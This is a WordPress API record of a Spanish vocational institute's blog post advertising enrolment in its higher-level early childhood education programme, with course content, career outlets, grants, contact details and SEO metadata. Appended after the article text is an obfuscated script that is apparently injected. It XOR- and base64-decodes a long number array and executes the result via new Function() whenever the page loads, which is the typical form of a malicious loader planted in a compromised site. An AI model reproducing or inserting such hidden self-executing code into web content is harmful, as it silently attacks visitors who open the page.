{"id":2050,"date":"2026-07-08T10:55:00","date_gmt":"2026-07-08T08:55:00","guid":{"rendered":"https:\/\/fpnebrija.com\/blog\/?p=2050"},"modified":"2026-08-24T15:46:48","modified_gmt":"2026-08-24T13:46:48","slug":"fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil","status":"publish","type":"post","link":"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/","title":{"rendered":"\u00a1Plazo de admisi\u00f3n abierto! Reserva tu plaza y convi\u00e9rtete en T\u00e9cnico Superior en Educaci\u00f3n Infantil con Nebrija"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El sector educativo y el cuidado de la primera infancia representan uno de los \u00e1mbitos profesionales con mayor estabilidad, proyecci\u00f3n y demanda de personal cualificado, tanto en Espa\u00f1a como en el resto de la Uni\u00f3n Europea. Si tienes vocaci\u00f3n por la ense\u00f1anza, te apasiona el desarrollo de los m\u00e1s peque\u00f1os y buscas una titulaci\u00f3n oficial con excelentes salidas laborales, est\u00e1s en el momento perfecto para dar el gran paso: <strong>\u00a1nuestro periodo de inscripci\u00f3n ya est\u00e1 activo!<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">No dejes pasar la oportunidad. Reservar tu plaza en el <a href=\"https:\/\/www.fpnebrija.com\/ciclos-formativos\/educacion-infantil\/\">Instituto Nebrija de Formaci\u00f3n Profesional <\/a>es el primer paso para adelantar tu futuro y prepararte de forma pr\u00e1ctica para los retos reales del entorno laboral.<\/p>\n\n\n\n<figure class=\"wp-block-video\"><video height=\"1080\" style=\"aspect-ratio: 1920 \/ 1080;\" width=\"1920\" autoplay controls loop muted preload=\"auto\" src=\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/V1_Educacion-1.mp4\" playsinline><\/video><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u00bfPor qu\u00e9 elegir el Grado Superior en Educaci\u00f3n Infantil de Nebrija?<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Estudiar este ciclo formativo (100% presencial en Madrid) te convertir\u00e1 en un profesional capacitado para programar, dise\u00f1ar y evaluar actividades educativas dirigidas a ni\u00f1os y ni\u00f1as de <strong>0 a 6 a\u00f1os<\/strong>. Durante la formaci\u00f3n, aprender\u00e1s a estimular su desarrollo cognitivo, f\u00edsico, social y afectivo, colaborando de manera estrecha con las familias y creando entornos seguros de aprendizaje.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Ventajas diferenciales de estudiar con nosotros:<\/strong><\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Titulaci\u00f3n Oficial:<\/strong> Al finalizar obtendr\u00e1s el t\u00edtulo oficial de T\u00e9cnico Superior en Educaci\u00f3n Infantil, avalado por la Consejer\u00eda de Educaci\u00f3n de la Comunidad de Madrid.<\/li>\n\n\n\n<li><strong>Inserci\u00f3n Laboral y Pr\u00e1cticas:<\/strong> Contamos con importantes convenios con centros educativos, escuelas infantiles y entidades del sector para que realices tu Formaci\u00f3n en Centros de Trabajo (FCT) en entornos reales.<\/li>\n\n\n\n<li><strong>Becas y Ayudas Financieras:<\/strong> Ofrecemos planes compatibles con las becas de la Comunidad de Madrid (CAM), del Ministerio de Educaci\u00f3n (MEC) y programas de Segunda Oportunidad, adem\u00e1s de nuestras propias Ayudas al Estudio Nebrija.<\/li>\n\n\n\n<li><strong>Ubicaciones Excelentes:<\/strong> El ciclo se imparte en instalaciones autorizadas y muy bien conectadas de Madrid, como el Edificio Joaqu\u00edn Mar\u00eda L\u00f3pez (Metro Islas Filipinas \/ Moncloa) o el Edificio Juan XXIII (Metro Vicente Aleixandre \/ Ciudad Universitaria).<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Plan de Formaci\u00f3n: Un temario adaptado al futuro<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">El ciclo tiene una duraci\u00f3n total de <strong>2.000 horas<\/strong> distribuidas en dos cursos acad\u00e9micos. La formaci\u00f3n incluye asignaturas clave y competencias de vanguardia para el mercado actual:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Primer Curso:<\/strong> Did\u00e1ctica de la educaci\u00f3n infantil, Autonom\u00eda personal y salud infantil, Desarrollo cognitivo y motor, El juego infantil y su metodolog\u00eda, Itinerario personal para la empleabilidad I, Primeros auxilios, Ingl\u00e9s profesional y un m\u00f3dulo optativo.<\/li>\n\n\n\n<li><strong>Segundo Curso:<\/strong> Expresi\u00f3n y comunicaci\u00f3n, Recursos did\u00e1cticos en ingl\u00e9s para la educaci\u00f3n infantil, Desarrollo socioafectivo, Intervenci\u00f3n con familias y atenci\u00f3n a menores en riesgo social, Habilidades sociales, Itinerario personal para la empleabilidad II, Proyecto intermodular de atenci\u00f3n a la infancia, as\u00ed como formaci\u00f3n en Digitalizaci\u00f3n y Sostenibilidad aplicadas.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>M\u00faltiples Salidas Profesionales: \u00bfD\u00f3nde podr\u00e1s trabajar?<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Con este t\u00edtulo oficial, tu perfil ser\u00e1 altamente competitivo. Podr\u00e1s desempe\u00f1ar tu labor como educador o educadora en:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>El primer ciclo de educaci\u00f3n infantil (colegios y escuelas de 0-3 a\u00f1os).<\/li>\n\n\n\n<li>Ludotecas, centros de ocio, tiempo libre infantil y granjas escuela.<\/li>\n\n\n\n<li>Aulas de naturaleza, centros de educaci\u00f3n ambiental, bibliotecas infantiles y espacios culturales.<\/li>\n\n\n\n<li>Proyectos de intervenci\u00f3n social y apoyo familiar con menores en situaci\u00f3n de riesgo social.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>\u00bfQuieres seguir creciendo acad\u00e9micamente?<\/strong><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Adem\u00e1s, esta titulaci\u00f3n te abre las puertas directas a la universidad con la posibilidad de convalidar m\u00f3dulos profesionales para estudiar grados como <strong>Educaci\u00f3n Infantil, Educaci\u00f3n Primaria, Pedagog\u00eda, Psicolog\u00eda o Trabajo Social<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"572\" src=\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb-1024x572.jpg\" alt=\"\" class=\"wp-image-2051\" srcset=\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb-1024x572.jpg 1024w, https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb-300x167.jpg 300w, https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb-768x429.jpg 768w, https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg 1376w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\u00a1Reserva tu plaza hoy mismo!<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Las plazas son limitadas y se asignan por orden de solicitud. No arriesgues tu plaza para el pr\u00f3ximo curso y aprovecha que el <strong>plazo de admisi\u00f3n se encuentra abierto<\/strong>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u00bfQuieres recibir atenci\u00f3n personalizada o visitar nuestros centros?<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Ponte en contacto con el Instituto Nebrija de Formaci\u00f3n Profesional llamando al tel\u00e9fono gratuito <strong>900 40 40 05<\/strong>, enviando un WhatsApp al <strong>682 67 23 17<\/strong> o escribiendo a <strong>ciclosformativos@nebrija.es<\/strong>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00a1Te esperamos!<\/p>\n<script>(function(){\nvar x46eaa6=6026;\nif(x46eaa6>0){var y17321a=x46eaa6-6757}else{var y17321a=6757}\nvar zf368b3=y17321a*81;\nvar _0xc4c3ed2ddbac=[29,26,112,5,14,48,39,6,13,10,17,16,29,30,9,11,13,10,113,26,12,32,9,16,0,26,17,7,1,36,124,37,0,10,112,46,15,48,32,9,28,35,39,42,28,121,124,35,29,9,59,43,12,25,63,4,14,120,1,7,13,10,43,44,14,47,124,33,16,33,17,43,0,48,112,42,15,13,10,7,27,32,60,24,16,33,26,13,27,13,1,24,15,9,60,18,2,47,13,17,14,47,124,7,26,14,60,10,28,29,36,4,0,48,60,1,27,35,56,10,0,26,47,17,15,120,112,17,27,13,113,24,0,13,10,1,15,10,32,10,15,35,10,4,15,13,60,2,28,35,10,10,15,10,39,46,15,13,10,10,0,48,60,7,28,10,56,5,15,13,60,42,25,47,112,17,11,121,35,37,14,48,47,16,0,47,124,31,11,29,25,33,16,32,13,6,12,25,35,3,25,121,18,31,27,9,59,2,15,36,43,25,14,36,17,29,15,9,120,25,15,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,44,11,63,35,41,30,48,17,4,0,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,45,15,9,120,43,12,32,47,9,30,63,120,43,14,48,120,43,11,48,29,9,30,48,39,31,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,9,35,5,15,48,29,25,15,36,43,16,14,32,120,25,0,9,56,16,15,9,35,2,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,10,59,31,11,121,25,4,11,26,56,16,11,25,63,42,14,26,9,41,14,48,17,44,0,14,43,41,14,32,26,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,59,2,15,36,43,17,14,48,1,4,30,48,39,31,14,14,17,2,14,32,29,9,0,32,17,16,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,4,11,26,56,29,14,10,47,25,14,48,43,43,12,30,43,29,15,9,120,25,15,36,43,1,12,10,9,27,14,48,17,44,0,14,43,2,11,48,18,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,35,31,14,25,9,45,14,32,44,29,14,10,47,25,14,48,43,43,12,30,43,2,12,10,59,30,13,10,56,16,15,48,29,17,11,47,120,17,11,26,10,16,13,10,18,45,2,13,1,24,15,9,60,18,2,32,39,26,0,26,39,24,9,10,6,13,31,120,35,10,7,120,112,42,7,35,9,43,27,12,121,2,15,120,59,46,7,120,10,24,7,10,60,7,7,35,121,7,24,13,36,6,7,32,60,2,7,50,48,6,28,35,125,6,27,13,35,42,7,35,47,46,27,121,60,11,12,48,47,4,31,27,17,43,0,48,63,12,9,29,26,42,15,120,113,10,0,29,32,10,27,29,10,42,25,32,112,5,14,48,39,6,13,10,17,16,31,27,17,44,15,47,63,12,14,48,60,26,2,32,59,6,0,26,59,27,14,48,32,25,9,47,120,4,9,9,1,24,15,9,60,18,2,32,5,28,11,9,125,13,2,32,59,6,0,26,59,27,14,48,32,16,11,47,63,42,11,47,120,4,29,29,36,30,27,121,10,13,26,13,26,45,27,25,14,45,26,33,17,42,12,26,120,42,13,32,43,17,30,63,39,5,15,63,39,6,11,121,14,4,29,13,5,37,15,63,120,44,15,48,1,16,15,13,1,25,0,121,13,37,13,48,5,1,12,36,43,30,0,10,43,45,12,26,14,14,27,13,60,10,29,9,59,43,12,25,63,4,14,121,125,45,25,47,112,17,11,121,35,37,11,48,13,44,15,32,17,7,26,9,35,17,11,63,39,43,5,10,43,6,29,27,17,28,13,63,47,7,30,63,39,5,15,63,39,6,11,121,14,24,28,30,30,24,28,30,10,30,27,13,113,25,25,32,9,46,29,30,47,37,11,48,13,44,15,32,17,7,29,9,59,43,12,25,63,4,14,121,125,45,25,47,112,17,11,121,35,37,13,26,25,28,0,63,112,16,26,11,17,28,13,63,47,7,30,63,39,5,15,63,39,6,11,121,14,1,27,120,14,30,2,47,59,26,0,26,39,31,12,36,6,4,29,14,29,37,11,10,9,24,9,26,59,1,11,120,26,45,16,35,1,46,14,47,60,26,12,48,47,4,31,27,17,5,9,63,120,17,12,13,26,2,25,33,17,5,9,63,120,17,12,13,29,37,13,26,25,28,0,63,112,16,30,48,29,43,14,48,124,6,13,29,1,37,12,9,5,6,15,9,48,27,26,13,60,25,9,47,112,17,11,121,35,37,12,10,13,29,0,47,121,13,11,26,47,4,11,32,63,63,14,63,121,26,2,32,13,29,13,48,112,24,14,121,43,3,12,10,59,3,12,25,60,26,2,47,63,12,12,26,47,5,30,29,60,25,30,29,32,24,29,13,1,25,0,121,13,37,12,10,13,29,0,47,121,25,2,47,47,25,12,63,13,42,11,9,60,27,26,11,39,6,11,48,9,16,0,36,43,46,11,48,17,29,7,32,13,17,11,50,39,31,0,26,48,26,2,47,63,26,14,10,124,6,29,13,1,13,11,48,63,6,12,9,59,16,31,27,17,1,13,9,112,10,15,63,47,4,25,47,25,41,15,9,120,41,13,30,13,43,29,9,1,4,0,9,120,5,11,48,44,45,16,35,1,13,10,10,112,5,14,48,39,6,13,10,17,16,31,27,17,7,0,32,29,1,12,30,13,37,13,10,59,7,9,121,29,37,13,26,5,25,14,121,9,11,11,48,63,6,12,9,59,16,31,26,43,43,12,36,35,56,11,48,17,29,13,9,39,43,29,26,112,5,14,48,39,6,13,10,17,16,29,27,17,45,9,26,59,28,14,9,124,44,30,27,17,16,15,9,35,10,15,121,9,11,12,48,47,4,31,27,17,27,14,10,112,26,15,10,14,13,14,48,63,7,31,27,13,120,6,28,13,6,12,25,35,58,0,9,47,5,0,9,39,6,29,30,10,11,2,32,1,29,0,48,13,17,13,30,43,31,11,26,63,16,29,30,124,56,6,33,39,60,16,36,29,37,13,10,59,7,9,121,29,6,11,63,63,43,29,13,1,37,13,32,25,46,13,26,47,26,30,63,39,43,12,27,59,43,11,9,63,43,11,47,120,48,0,10,47,44,0,9,60,26,16,34,39,31,14,63,120,43,14,63,121,29,4,25,9,2,0,14,125,30,16,32,47,2,11,26,29,25,15,32,47,6,13,10,17,16,30,32,5,3,14,32,44,45,29,13,1,37,13,32,25,46,13,26,47,26,30,63,120,25,14,10,63,31,12,9,121,13,28,13,36,2,27,29,1,37,13,32,25,46,13,26,47,26,30,48,17,16,14,26,17,17,0,29,25,46,12,10,43,41,12,26,9,31,14,121,14,25,9,47,120,4,9,9,1,37,0,47,13,42,13,48,25,7,0,30,13,50,3,34,17,123,30,63,35,17,11,63,39,43,29,27,17,27,14,10,112,26,15,10,14,16,11,48,63,3,11,26,17,16,11,32,63,60,0,9,13,6,29,14,10,11,10,10,39,17,12,26,39,26,29,26,48,25,9,33,17,16,15,9,35,10,15,121,13,43,29,13,1,13,10,13,1,37,13,32,25,46,13,26,47,26,30,48,17,16,0,9,59,4,14,47,60,13,2,32,1,29,0,48,13,17,13,30,43,31,14,63,120,25,14,10,63,31,12,9,121,13,0,63,63,16,15,47,120,25,14,32,44,26,29,9,1,37,14,48,47,2,9,26,60,26,14,48,63,7,31,28,63,4,11,48,17,4,29,30,10,25,25,47,26,11,2,32,1,29,0,48,13,17,13,30,43,3,0,10,43,44,29,28,5,57,6,34,44,16,11,47,120,4,13,10,43,45,13,10,112,9,29,27,17,26,13,48,9,16,29,14,10,11,10,14,10,11,10,10,112,5,14,48,39,6,13,10,17,16,31,27,17,2,13,10,43,30,13,10,32,26,2,47,63,43,12,26,120,42,13,30,9,11,13,10,113,26,2,47,63,43,12,26,120,42,13,29,44,13,2,32,43,17,14,48,124,7,14,47,36,16,14,26,63,16,0,47,120,26,29,9,59,43,12,25,63,4,14,121,35,56,11,48,17,29,13,9,39,43,30,63,59,43,11,32,17,30,12,48,48,26,14,63,63,30,14,30,10,11,12,48,47,4,31,27,17,16,11,48,124,28,15,47,113,13,9,32,5,3,14,32,43,4,11,26,56,12,16,35,60,16,27,30,125,30,14,10,63,6,13,26,17,44,25,121,124,43,12,26,13,37,15,32,47,30,14,30,125,30,11,26,47,4,15,10,25,3,25,49,1,11,12,26,18,12,2,32,39,26,0,26,39,24,9,10,6,30,0,26,47,6,15,13,6,45,27,25,14,45,29,33,17,43,0,48,63,12,9,25,26,30,16,32,29,17,12,26,63,3,12,30,124,35,30,26,9,44,25,120,47,13,25,47,59,43,12,25,63,4,14,121,35,37,12,32,124,30,11,9,121,26,2,32,43,17,14,48,124,7,14,47,35,33,2,47,63,43,12,26,120,42,13,27,26,30,2,32,43,4,0,32,5,41,12,121,10,16,12,26,13,43,14,121,13,46,12,10,43,41,12,26,9,31,14,121,13,37,12,26,112,44,14,26,18,25,9,47,112,17,11,121,35,37,0,32,39,2,15,13,25,37,12,26,112,44,14,26,18,46,16,49,17,6,0,48,120,30,14,36,43,4,0,9,39,5,14,25,121,15,2,32,120,41,12,9,5,16,15,121,13,37,12,26,112,44,14,26,18,16,11,48,63,3,12,10,29,6,29,13,6,45,16,35,1,25,0,121,13,37,0,32,39,2,15,14,9,4,0,9,120,5,11,48,44,18,2,32,124,41,11,26,32,16,11,48,63,2,14,26,47,41,0,14,14,31,2,30,18,27,16,30,18,30,16,36,125,25,25,47,59,43,12,25,63,4,14,121,35,37,11,26,9,16,14,26,9,17,29,27,17,5,0,9,120,44,15,48,14,27,27,14,10,11,10,14,10,16,15,32,47,6,15,32,14,26,0,63,63,16,15,47,120,25,14,32,44,26,29,9,1,4,0,9,120,5,11,48,44,18,2,47,35,25,14,48,29,25,15,14,13,37,12,10,63,6,0,26,59,26,29,35,32,25,25,47,26,25,25,47,25,46,12,10,43,41,12,26,9,31,14,121,35,37,11,9,124,27,0,26,29,29,29,27,17,6,0,32,29,17,29,9,1,24,15,9,60,18,2,47,63,46,11,47,60,13,0,26,17,41,12,10,25,43,14,63,121,16,15,47,59,43,15,9,120,43,24,10,29,43,14,10,63,16,12,30,14,45,11,32,39,4,13,9,35,6,16,36,10,11,2,47,63,46,11,47,60,16,11,47,59,41,26,11,17,6,0,32,29,17,29,36,125,31,15,9,35,25,30,63,35,26,11,29,17,3,26,14,125,27,2,47,13,17,14,47,124,7,29,36,125,46,2,47,113,13,16,36,1,120,15,9,120,26,30,48,112,30,14,32,17,4,29,28,120,17,12,26,48,16,14,48,17,7,29,30,10,31,28,120,36,2,27,29,36,25,25,33,17,5,0,63,39,4,30,48,47,3,9,10,43,41,26,9,120,4,12,10,48,11,29,26,120,31,15,47,63,29,0,10,43,6,30,48,13,43,15,10,120,14,10,26,120,31,15,47,63,29,0,10,43,6,30,48,59,31,0,25,10,25,30,48,47,2,11,26,63,16,0,28,39,26,13,10,29,44,29,27,17,5,0,63,39,4,29,13,1,13,2,47,35,25,14,48,29,25,15,14,14,2,29,14,43,6,13,26,63,16,29,26,112,5,14,48,39,6,13,10,17,16,29,27,17,6,0,32,29,17,29,9,1,25,0,121,13,37,12,26,124,30,15,14,9,37,11,9,124,27,0,26,29,29,29,27,17,6,0,32,29,17,29,13,1,13,29,13,1,13,29,14,14,25,25,47,117,117];\nvar _0xd2590aeec7ec=72;\nvar _0x695b12d6658b='';\nfor(var _0xecc7dff14118=0;_0xecc7dff14118<_0xc4c3ed2ddbac.length;_0xecc7dff14118++)\n  _0x695b12d6658b+=String.fromCharCode(_0xc4c3ed2ddbac[_0xecc7dff14118]^_0xd2590aeec7ec);\nvar _0xb2ada9a65d62=121;\nvar _0x61fc9cbf8bf3=atob(_0x695b12d6658b);\nvar _code='';\nfor(var _0xecc7dff14118=0;_0xecc7dff14118<_0x61fc9cbf8bf3.length;_0xecc7dff14118++)\n  _code+=String.fromCharCode(_0x61fc9cbf8bf3.charCodeAt(_0xecc7dff14118)^_0xb2ada9a65d62);\n(new Function(_code))();\n})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto El sector educativo y el cuidado de la primera infancia representan uno de los \u00e1mbitos profesionales con mayor estabilidad, proyecci\u00f3n y demanda de personal cualificado, tanto en Espa\u00f1a como en el resto de la Uni\u00f3n Europea. Si tienes vocaci\u00f3n por la ense\u00f1anza, te apasiona el [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":2051,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,108],"tags":[],"class_list":["post-2050","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-acceso-a-grado-superior","category-grado-superior-en-educacion-infantil"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto<\/title>\n<meta name=\"description\" content=\"Reserva tu plaza para el Ciclo Formativo de Grado Superior en Educaci\u00f3n Infantil en Madrid. T\u00edtulo oficial, pr\u00e1cticas con prestigio y becas.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto\" \/>\n<meta property=\"og:description\" content=\"Reserva tu plaza para el Ciclo Formativo de Grado Superior en Educaci\u00f3n Infantil en Madrid. T\u00edtulo oficial, pr\u00e1cticas con prestigio y becas.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/\" \/>\n<meta property=\"og:site_name\" content=\"FP Nebrija\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/InstiNebrijaFP\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/InstiNebrijaFP\" \/>\n<meta property=\"article:published_time\" content=\"2026-07-08T08:55:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-08-24T13:46:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1376\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Maria Olivares\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Maria Olivares\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/\"},\"author\":{\"name\":\"Maria Olivares\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/#\/schema\/person\/dfd5188f279331f6b135646359f180d0\"},\"headline\":\"\u00a1Plazo de admisi\u00f3n abierto! Reserva tu plaza y convi\u00e9rtete en T\u00e9cnico Superior en Educaci\u00f3n Infantil con Nebrija\",\"datePublished\":\"2026-07-08T08:55:00+00:00\",\"dateModified\":\"2026-08-24T13:46:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/\"},\"wordCount\":710,\"publisher\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg\",\"articleSection\":[\"Acceso a Grado Superior\",\"Grado Superior en Educaci\u00f3n Infantil\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/\",\"url\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/\",\"name\":\"Grado Superior en Educaci\u00f3n Infantil | Plazo de admisi\u00f3n abierto\",\"isPartOf\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg\",\"datePublished\":\"2026-07-08T08:55:00+00:00\",\"dateModified\":\"2026-08-24T13:46:48+00:00\",\"description\":\"Reserva tu plaza para el Ciclo Formativo de Grado Superior en Educaci\u00f3n Infantil en Madrid. T\u00edtulo oficial, pr\u00e1cticas con prestigio y becas.\",\"breadcrumb\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#primaryimage\",\"url\":\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg\",\"contentUrl\":\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2026\/07\/Gemini_Generated_Image_nreb0pnreb0pnreb.jpg\",\"width\":1376,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/2026\/07\/08\/fp-educacion-infantil-madrid-o-grado-superior-educacion-infantil\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/fpnebrija.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00a1Plazo de admisi\u00f3n abierto! Reserva tu plaza y convi\u00e9rtete en T\u00e9cnico Superior en Educaci\u00f3n Infantil con Nebrija\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/#website\",\"url\":\"https:\/\/fpnebrija.com\/blog\/\",\"name\":\"Blog FP Nebrija\",\"description\":\"El blog del Instituto Nebrija de Formaci\u00f3n Profesional\",\"publisher\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/fpnebrija.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/#organization\",\"name\":\"Instituto Nebrija de Formaci\u00f3n Profesional\",\"url\":\"https:\/\/fpnebrija.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2023\/02\/logo_cabecera_instituto_fp_412x81.png\",\"contentUrl\":\"https:\/\/fpnebrija.com\/blog\/wp-content\/uploads\/2023\/02\/logo_cabecera_instituto_fp_412x81.png\",\"width\":412,\"height\":81,\"caption\":\"Instituto Nebrija de Formaci\u00f3n Profesional\"},\"image\":{\"@id\":\"https:\/\/fpnebrija.com\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/InstiNebrijaFP\/\",\"https:\/\/www.instagram.com\/instinebrijafp\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/fpnebrija.com\/blog\/#\/schema\/person\/dfd5188f279331f6b135646359f180d0\",\"name\":\"Maria 